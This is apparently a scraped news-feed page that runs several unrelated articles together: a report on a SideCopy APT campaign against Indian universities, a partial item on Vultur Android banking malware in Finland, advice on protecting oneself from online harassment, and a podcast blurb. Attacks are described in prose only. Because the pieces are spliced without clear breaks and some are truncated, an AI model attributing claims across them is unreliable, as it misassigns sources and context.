Normal view
SideCopy APT Campaign Found Targeting Indian Universities
Technical Analysis of the SideCopy Campaign Infection Chain
In early May, CRIL identified a malicious domain employed by the SideCopy group in their operations. The website was discovered hosting a ZIP archive file named "files.zip" that contained sub-directories labeled as "economy," "it," and "survey." The survey directory included files similar to those previously employed by SideCopy in their earlier campaigns. [caption id="attachment_68383" align="alignnone" width="1228"] Source: Cyble[/caption] The campaign likely employs spam emails to distribute the malicious ZIP archive hosted through the compromised website as the initial infection vector. These archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." Upon execution, the LNK files trigger a series of commands that proceeds to download and execute a malicious HTA file. The downloaded HTA files contain embedded payloads within additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics to appear legitimate to the targeted demographic. [caption id="attachment_68384" align="alignnone" width="604"] Source: Cyble Blog[/caption] [caption id="attachment_68385" align="alignnone" width="894"] Source: Cyble Blog[/caption] The malware is crafted with the functionality to adopt to the presence of different antivirus software such as Avast, Kaspersky and Bitdefender, which further amplifies its ability to evade detection and ensure persistence by placing the LNK shortcut files in the startup folder. The attack process ultimately leads to the deployment of malicious payloads such as Reverse RAT and Action RAT on to the victim system, which then connect to a remote Command-and-Control (C&C) server to commence malicious activities.Intersection with Transparent Tribe Activities
The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at a possible collaborative efforts or shared objectives between the two groups with researchers previously noting that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate tactics of the Sidewinder APT group in the distribute of malware files, such as the use of disguised LNK files to initiate a complex chain of infections. CRIL researchers have advised the use of strong email filtering systems, exercise of caution, the deployment of network-level monitoring and the disabling of scripting languages such as PowerShell, MSHTA, cmd.exe to prevent against this potential threat. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Finland Warns of New Android Malware that Siphons Money from your Bank
Finland Warns of New Android Malware that Siphons Money from your Bank
Vultur Android Malware Campaign Trademarks
While Finnish authorities have not definitively identified the type of malware involved or shared specific hashes or IDs for the APK files, the attacks bear a striking resemblance to those reported by Fox-IT analysts in connection with a new version of the Vultur trojan. [caption id="attachment_66873" align="alignnone" width="1024"] Vultur Trojan infection chain (Credit: Fox-IT)[/caption] The new iteration of the Vultur trojan employs hybrid smishing and phone call attacks to persuade targets into downloading a fake McAfee Security app. This app introduces the final payload in three separate parts for evasion purposes. Notable features of this latest version include extensive file management operations, abuse of Accessibility Services, app blocking, disabling Keyguard, and serving custom notifications in the status bar.Things to Do If You Suspect Being Victim
If you suspect that your device has been infected with the malware, it is advisable to contact your bank immediately to enable protection measures. Additionally, restoring "factory settings" on the infected Android device to wipe all data and apps is recommended. OP Financial Group emphasizes that they do not request customers to share sensitive data over the phone or install any apps to receive or cancel payments. “We will never send you messages with a link to the online bank login page. The bank also never asks you for your ID or card information via messages. Such messages are scams and you should not click on the links in them,” the OP Financial Group said. “Even in order to receive or cancel a payment, you do not need to log in from a link, confirm with codes or provide your information. If you are asked to do this, contact the bank's customer service.” Any similar requests should also be promptly reported to the police. The news of the online banking fraud comes days after a multi-national police operation crack opened a massive fraudulent call center network run across Europe that targeted especially senior citizens with an intent to dupe them of thousands of dollars. The crack down, dubbed Operation Pandora, was initiated when a vigilant bank teller in Freiburg, Germany, alerted law enforcement of a customer aged 76-years attempting to withdraw a large sum of money. Scammers employed various tactics, posing as relatives, bank employees or police officers, to deceive victims into surrendering their savings. The operation revealed call centers operating in different countries, each specializing in different types of telephone fraud, from investment scams to debt collection demands. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.How to protect yourself from online harassment
It takes a little to receive a lot of online hate today, from simply working as a school administrator to playing a role in a popular movie or video game.
But these moments of personal crisis have few, immediate solutions, as the current proposals to curb and stem online harassment zero in on the systemic—such as changes in data privacy laws to limit the personal information that can be weaponized online or calls for major social media platforms to better moderate hateful content and its spread.
Such structural shifts can take years (if they take place at all), which can leave today’s victims feeling helpless.
There are, however, a few steps that everyday people can take, starting now, to better protect themselves against online hate and harassment campaigns. And thankfully, none of them involve “just getting off the internet,” a suggestion that, according to Leigh Honeywell, is both ineffective and unwanted.
“The [idea that the] answer to being bullied is that you shouldn’t be able to participate in public life—I don’t think that’s okay,” said Honeywell, CEO and co-founder of the digital safety consultancy Tall Poppy.
Speaking to me on the Lock and Code podcast last month, Honeywell explained that Tall Poppy’s defense strategies to online harassment incorporate best practices from Honeywell’s prior industry—cybersecurity.
Here are a few steps that people can proactively take to limit online harassment before it happens.
Get good at Googling yourself
One of the first steps in protecting yourself from online harassment is finding out what information about you is already available online. This is because, as Honeywell said, much of that information can be weaponized for abuse.
Picture an angry diner posting a chef’s address on Yelp alongside a poor review, or a complete stranger sending in a fake bomb threat to a school address, or a real-life bully scraping the internet for embarrassing photos of someone they want to harass.
All this information could be available online, and the best way to know if it exists is to do the searching yourself.
As for where to start?
“First name, last name, city name, or other characteristics about yourself,” Honeywell said, listing what, specifically, to search online.
It’s important to understand that the online search itself may not bring immediate results, but it will likely reveal active online profiles on platforms like LinkedIn, X (formerly Twitter), Facebook, and Instagram. If those profiles are public, an angry individual could scrape relevant information and use it to their advantage. Even a LinkedIn profile could be weaponized by someone who calls in fake complaints to a person’s employer, trying to have them fired from their position.
In combing through the data that you can find about yourself online, Honeywell said people should focus on what someone else could do with that data.
“If an adversary was trying to find out information about me, what would they find?” Honeywell said. “If they had that information, what would they do with it?”
Take down what you can
You’ve found what an adversary might use against you online. Now it’s time to take it down.
Admittedly, this can be difficult in the United States, as Americans are not protected by a national data privacy law that gives them the right to request their data be deleted from certain websites, platforms, and data brokers.
Where Americans could find some help, however, is from online resources and services that streamline the data removal process that is enshrined in some state laws. These tools, like the iOS app Permission Slip, released by Consumer Reports in 2022, show users what types of information companies are collecting about them, and give user the opportunity to request that such data be deleted.
Separately, Google released on online tool in 2023 where users can request that certain search results that contain their personal information be removed. You can learn more about the tool, called “Results about you,” here.
When all else fails, Honeywell said that people shouldn’t be afraid to escalate the situation to their state’s regulators. That could include filing an official complaint with a State Attorney General, or with the Consumer Financial Protection Bureau, or the Federal Trade Commission.
“It sounds like the big guns,” Honeywell said, “but I think it’s important that, as individuals, we do what we can to hold the companies that are creating this mess accountable.”
Lock down your accounts
If an adversary can’t find your information through an online search, they may try to steal that information by hacking into your accounts, Honeywell said.
“If I’m mad at David, I’m going to hack into David’s email and share personal information,” Honeywell said. “That’s a fairly standard way that we see some of the worst online harassment attacks escalate.”
While hackers may have plenty of novel tools at their disposal, the best defenses you can implement today are the use of unique passwords and multifactor authentication.
Let’s first talk about unique passwords.
Each and every single one of your online accounts—from your email, to your social media profiles, to your online banking—should have a strong, unique password. And because you likely have dozens upon dozens of online accounts to manage, you should keep track of all those passwords with a devoted password manager.
Using unique passwords is one of the best defenses to company data breaches that expose user login credentials. Once those credentials are available on the dark web, hackers will buy those credentials so they can attempt to use them to gain access to other online accounts. You can prevent those efforts going forward by refusing to repeat passwords across any of your online accounts.
Now, start using multifactor authentication, if you’re not already.
Multifactor authentication is offered by most major companies and services today, from your bank, to your email, to your medical provider. By using multifactor authentication, also called MFA or 2FA, you will be required to “authenticate” yourself with more than just your password. This means that when you enter your username and password onto a site or app, you will also be prompted with entering a separate code that is, in many cases, sent to your phone via text or an app.
MFA is one of the strongest protections to password abuse, ensuring that, even if a hacker has your username and password, they still can’t access your account because they will not have the additional authentication that is required to complete a login.
In the world of cybersecurity, these two defense practices are among the gold standard in stopping cyberattacks. In the world of online harassment, they’re much the same—they work to prevent the abuse of your online accounts.
Here to help
Online harassment is an isolating experience, but protecting yourself against it can be quite the opposite. Honeywell suggested that, for those who feel overwhelmed or who do not know where to start, they can find a friend to help.
“Buddy up,” Honeywell said. “If you’ve got a friend who’s good at Googling, work on each other’s profile, identify what information is out there about you.”
Honeywell also recommended going through data takedown requests together, as the processes can be “extremely tedious” and some of the services that promise to remove your information from the internet are really only trying to sell you a service.
If you’re still wondering what information about you is online and you aren’t comfortable with your way around Google, Malwarebytes has a new, free tool that reveals what information of yours is available on the dark web and across the internet at large. The Digital Footprint Portal, released in April, provides free, unlimited scans for everyone, and it can serve as a strong first step in understanding what information of yours needs to be locked down.
To learn what information about you has been exposed online, use our free scanner below.
- Malwarebytes Labs
- Going viral shouldn’t lead to bomb threats, with Leigh Honeywell: Lock and Code S05E06
Going viral shouldn’t lead to bomb threats, with Leigh Honeywell: Lock and Code S05E06
This week on the Lock and Code podcast…
A disappointing meal at a restaurant. An ugly breakup between two partners. A popular TV show that kills off a beloved, main character.
In a perfect world, these are irritations and moments of vulnerability. But online today, these same events can sometimes be the catalyst for hate. That disappointing meal can produce a frighteningly invasive Yelp review that exposes a restaurant owner’s home address for all to see. That ugly breakup can lead to an abusive ex posting a video of revenge porn. And even a movie or videogame can enrage some individuals into such a fury that they begin sending death threats to the actors and cast mates involved.
Online hate and harassment campaigns are well-known and widely studied. Sadly, they’re also becoming more frequent.
In 2023, the Anti-Defamation League revealed that 52% of American adults reported being harassed online at least some time in their life—the highest rate ever recorded by the organization and a dramatic climb from the 40% who responded similarly just one year earlier. When asking teens about recent harm, 51% said they’d suffered from online harassment in strictly the 12 months prior to taking the survey itself—a radical 15% increase from what teens said the year prior.
The proposed solutions, so far, have been difficult to implement.
Social media platforms often deflect blame—and are frequently shielded from legal liability—and many efforts to moderate and remove hateful content have either been slow or entirely absent in the past. Popular accounts with millions of followers will, without explicitly inciting violence, sometimes draw undue attention to everyday people. And the increasing need to have an online presence for teens—even classwork is done online now—makes it near impossible to simply “log off.”
Today, on the Lock and Code podcast with host David Ruiz, we speak with Tall Poppy CEO and co-founder Leigh Honeywell, about the evolution of online hate, personal defense strategies that mirror many of the best practices in cybersecurity, and the modern risks of accidentally becoming viral in a world with little privacy.
“It’s not just that your content can go viral, it’s that when your content goes viral, five people might be motivated enough to call in a fake bomb threat at your house.”
Leigh Honeywell, CEO and co-founder of Tall Poppy
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.